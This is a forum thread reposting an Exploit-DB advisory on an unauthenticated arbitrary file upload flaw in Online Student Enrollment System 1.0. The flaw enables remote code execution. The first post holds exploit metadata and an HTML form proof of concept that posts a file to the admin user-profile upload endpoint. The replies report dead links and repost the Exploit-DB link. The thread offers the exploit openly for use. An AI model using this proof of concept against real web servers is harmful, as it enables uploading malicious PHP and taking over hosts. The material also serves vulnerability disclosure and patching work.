Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload filter_list
Author
Message
Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload #1
# Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
# Google Dork: N/A
# Vendor Homepage: https://www.campcodes.com/projects/p...in-php-mysqli/
# Software Link: https://www.sourcecodester.com/sites...rollment_1.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A

# Vulnerability:
Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.

#CSRF PoC:

<html>
<body>
<form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">
<input type="file" name="userphoto" required="" id="photo"><br>
<input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo">
</form>
</body>
</html>


Quote:Original Link to the Exploit!
https://www.exploit-db.com/exploits/48610
(This post was last modified: 04-24-2021, 09:05 PM by SCARIO.)
we obey a god that does not exist.
SCARIO

Reply

RE: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload #2
Both links are dead !!!!!
[Image: yDlzYyawRFK9-zbPiAD0Zw.png]

Reply

RE: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload #3
(04-14-2021, 07:13 PM)xVita Wrote: Both links are dead !!!!!
Original Link to the Exploit!
https://www.exploit-db.com/exploits/48610
[Image: 1ZmB97]

Reply







Users browsing this thread: 1 Guest(s)